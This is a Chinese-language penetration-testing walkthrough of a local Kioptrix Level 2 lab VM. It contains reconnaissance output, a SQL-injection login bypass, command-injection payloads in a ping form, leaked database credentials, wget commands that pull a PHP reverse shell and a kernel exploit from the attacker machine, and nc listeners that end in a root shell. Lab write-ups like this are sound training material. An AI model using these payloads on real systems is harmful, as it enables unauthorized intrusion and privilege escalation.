# 靶场搭建
直接复制上去不能直接使用
我添加了一张网卡上去,使用的 NAT 模式。开机的时候会要求进行网络配置,空格选中 DHCP 配置方式后保存就行。
他会直接连到虚拟机网络中。
IP 地址: 192.168.74.134
# 信息收集
# nmap
# 全端口扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap -p- 192.168.74.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 02:42 EDT
Nmap scan report for 192.168.74.134
Host is up (0.00056s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
911/tcp open xact-backup
3306/tcp open mysql
MAC Address: 00:0C:29:E9:5F:E5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds
# 详细信息扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap -A 192.168.74.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 02:30 EDT
Nmap scan report for 192.168.74.134
Host is up (0.00081s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 908/udp status
|_ 100024 1 911/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2024-04-06T03:21:24+00:00; -3h09m42s from scanner time.
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
911/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:E9:5F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -3h09m42s
TRACEROUTE
HOP RTT ADDRESS
1 0.81 ms 192.168.74.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds
# nikto
┌──(root㉿kali)-[~/Desktop]
└─# nikto -h 192.168.74.134
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.74.134
+ Target Hostname: 192.168.74.134
+ Target Port: 80
+ Start Time: 2024-04-06 02:32:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ /: Retrieved x-powered-by header: PHP/4.3.9.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /manual/: Uncommon header 'tcn' found, with contents: choice.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8909 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2024-04-06 02:33:39 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirsearch
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.134/
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.134\__24-04-06_14-33-05.txt
Target: http://192.168.74.134/
[14:33:05] Starting:
[14:33:10] 403 - 293B - /.ht_wsr.txt
[14:33:10] 403 - 296B - /.htaccess.bak1
[14:33:10] 403 - 296B - /.htaccess.save
[14:33:10] 403 - 296B - /.htaccess.orig
[14:33:10] 403 - 298B - /.htaccess.sample
[14:33:10] 403 - 297B - /.htaccess_extra
[14:33:10] 403 - 296B - /.htaccess_orig
[14:33:10] 403 - 294B - /.htaccessBAK
[14:33:10] 403 - 294B - /.htaccess_sc
[14:33:10] 403 - 294B - /.htaccessOLD
[14:33:10] 403 - 286B - /.htm
[14:33:10] 403 - 287B - /.html
[14:33:10] 403 - 295B - /.htaccessOLD2
[14:33:10] 403 - 296B - /.htpasswd_test
[14:33:10] 403 - 292B - /.htpasswds
[14:33:10] 403 - 293B - /.httr-oauth
[14:33:54] 403 - 290B - /cgi-bin/
[14:34:11] 403 - 288B - /error/
[14:34:34] 301 - 317B - /manual -> http://192.168.74.134/manual/
[14:34:34] 200 - 7KB - /manual/index.html
[14:35:22] 403 - 287B - /usage
Task Completed
首页是一个登录页面,可以尝试 sql 注入随便试了试就过去了 ==、 无语死了
# 漏洞利用
# Web 页面
登录口存在 sql 注入,直接万能密码就进来了
btnLogin=Login&psw=admin' or '1'='1&uname=admin
进来之后是一个 ping 命令的命令执行,老生常谈了
随便加一个 ; 就绕过了
输入 127.0.0.1;ls -al ,点击 submit,得到结果:
127.0.0.1;ls -al | |
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. | |
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.012 ms | |
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms | |
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.022 ms | |
--- 127.0.0.1 ping statistics --- | |
3 packets transmitted, 3 received, 0% packet loss, time 1999ms | |
rtt min/avg/max/mdev = 0.012/0.018/0.022/0.004 ms, pipe 2 | |
total 24 | |
drwxr-xr-x 2 root root 4096 Oct 8 2009 . | |
drwxr-xr-x 8 root root 4096 Oct 7 2009 .. | |
-rwxr-Sr-t 1 root root 1733 Feb 9 2012 index.php | |
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php |
发现只有读取没有写入权限啊
查看 index.php 内容 127.0.0.1;cat index.php ,在查看一下源代码,发现数据库账号密码和库名
<!--?php | |
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error()); | |
//print "Connected to MySQL<br /--> | |
"; | |
mysql_select_db("webapp"); | |
if ($_POST['uname'] != ""){ | |
$username = $_POST['uname']; | |
$password = $_POST['psw']; | |
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'"; | |
//print $query." | |
"; | |
$result = mysql_query($query); | |
$row = mysql_fetch_array($result); | |
//print "ID: ".$row['id']." | |
"; | |
} | |
?> |
- 账号:john
- 密码:hiroshima
- 库名:webapp
连了一下,屮有白名单,连不上去
anyway,我们需要拿 shell
当前目录在 /var/www/html 下,该目录只有 root 有写入权限,那么我们只能换一个目录进行。选择 /tmp 写入反连,然后 kali 进行监听
# 准备反连php
┌──(root㉿kali)-[~/Desktop]
└─# mysql -h 192.168.74.134 -u john
ERROR 1130 (HY000): Host '192.168.74.129' is not allowed to connect to this MySQL server
┌──(root㉿kali)-[~/Desktop]
└─# php-reverse-shell
php-reverse-shell: command not found
┌──(root㉿kali)-[~/Desktop]
└─# cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
┌──(root㉿kali)-[~/Desktop]
└─# vim shell.php
# 进行监听
┌──(root㉿kali)-[~/Desktop]
└─# cat shell.php| nc -l -p 38856
发送 payload: 127.0.0.1 && wget 192.168.74.129:38856 -O /tmp/rshell.php
生成后门后,再次进行监听
┌──(root㉿kali)-[~/Desktop]
└─# nc -lnvp 1234
发送 payload: 127.0.0.1 && php /tmp/rshell.php
┌──(root㉿kali)-[~/Desktop]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.134] 32770
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
00:15:56 up 59 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$ whoami
apache
拿到 apache 用户 shell,下一步进行提权
我首先尝试了使用 metasploit 进行提权,使用 payload/cmd/unix/reverse_bash 模块监听,通过已获取的 shell 重新弹入一个 shell 至 metasploit,运行 post/multi/recon/local_exploit_suggester 模块查找可以使用的提权模块
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.74.134 - Collecting local exploits for cmd/unix...
[*] 192.168.74.134 - 190 exploit checks are being tried...
[+] 192.168.74.134 - exploit/openbsd/local/dynamic_loader_chpass_privesc: The service is running, but could not be validated. Patch 013_ldso is not present
[*] Running check method for exploit 20 / 20
[*] 192.168.74.134 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/openbsd/local/dynamic_loader_chpass_privesc Yes The service is running, but could not be validated. Patch 013_ldso is not present
2 exploit/aix/local/ibstat_path No The target is not exploitable. /usr/bin/ibstat is not set-uid root
3 exploit/aix/local/invscout_rpm_priv_esc No The target is not exploitable. /usr/sbin/invscout is not executable
4 exploit/aix/local/xorg_x11_server No The check raised an exception.
5 exploit/linux/local/cve_2021_38648_omigod No The target is not exploitable. The omiserver process was not found.
6 exploit/linux/local/pihole_remove_commands_lpe No The target is not exploitable. Pi-Hole version 0 is >= 5.3 and not vulnerable
7 exploit/linux/local/vmware_workspace_one_access_certproxy_lpe No The target is not exploitable. Not running as the horizon user.
8 exploit/linux/local/vmware_workspace_one_access_cve_2022_22960 No The target is not exploitable. Not running as the horizon user.
9 exploit/linux/local/zpanel_zsudo No The target is not exploitable.
10 exploit/linux/local/zyxel_suid_cp_lpe No The target is not exploitable. Could not read /zyinit/fwversion. The target is not a Zyxel firewall.
11 exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout No The check raised an exception.
12 exploit/multi/local/xorg_x11_suid_server No The target is not exploitable.
13 exploit/osx/local/feedback_assistant_root No The check raised an exception.
14 exploit/osx/local/sudo_password_bypass No The target is not exploitable.
15 exploit/qnx/local/ifwatchd_priv_esc No The check raised an exception.
16 exploit/solaris/local/xscreensaver_log_priv_esc No The check raised an exception.
17 exploit/unix/local/chkrootkit No The target is not exploitable.
18 exploit/unix/local/emacs_movemail No The target is not exploitable.
19 exploit/unix/local/exim_perl_startup No The target is not exploitable.
20 exploit/unix/local/setuid_nmap No The target is not exploitable. /usr/bin/nmap is not setuid
发现有一个可能进行提权
但是!我用了,不行。
msf6 exploit(openbsd/local/dynamic_loader_chpass_privesc) > run
[*] Started reverse TCP double handler on 192.168.74.129:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Patch 013_ldso is not present
[!] Could not determine libutil.so name. Using: libutil.so.12.1, libutil.so.13.1
[*] Writing '/tmp/.Xg7bSmDg.c' (316 bytes) ...
[*] Compiling /tmp/libutil.so.12.1 ...
[-] /tmp/.Xg7bSmDg.c: In function `_init':
/tmp/.Xg7bSmDg.c:7: error: `_PATH_KSHELL' undeclared (first use in this function)
/tmp/.Xg7bSmDg.c:7: error: (Each undeclared identifier is reported only once
/tmp/.Xg7bSmDg.c:7: error: for each function it appears in.)
/tmp/.Xg7bSmDg.c:7: error: syntax error before string constant
[-] Exploit aborted due to failure: unknown: /tmp/libutil.so.12.1.c failed to compile
[*] Exploit completed, but no session was created.
编译失败,对此感到困惑,知道的哥们踢我
那么去 searchsploit 中查一下有没有提权模块
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit centos 4.5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation | linux/local/35370.c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
中间那个版本正好,拿出来传上去编译一下,直接 pwn
┌──(root㉿kali)-[~/Desktop]
└─# cat 9542.c| nc -lp 9999
提交 ping
127.0.0.1 && wget 192.168.74.129:9999 -O /tmp/pwn.c
传上去之后用拿到的 shell 编译运行
sh-3.00$ gcc -o /tmp/pwn /tmp/pwn.c | |
/tmp/pwn.c:109:28: warning: no newline at end of file | |
sh-3.00$ /tmp/pwn | |
sh: no job control in this shell | |
sh-3.00# whoami | |
root |
拿到了 root 权限
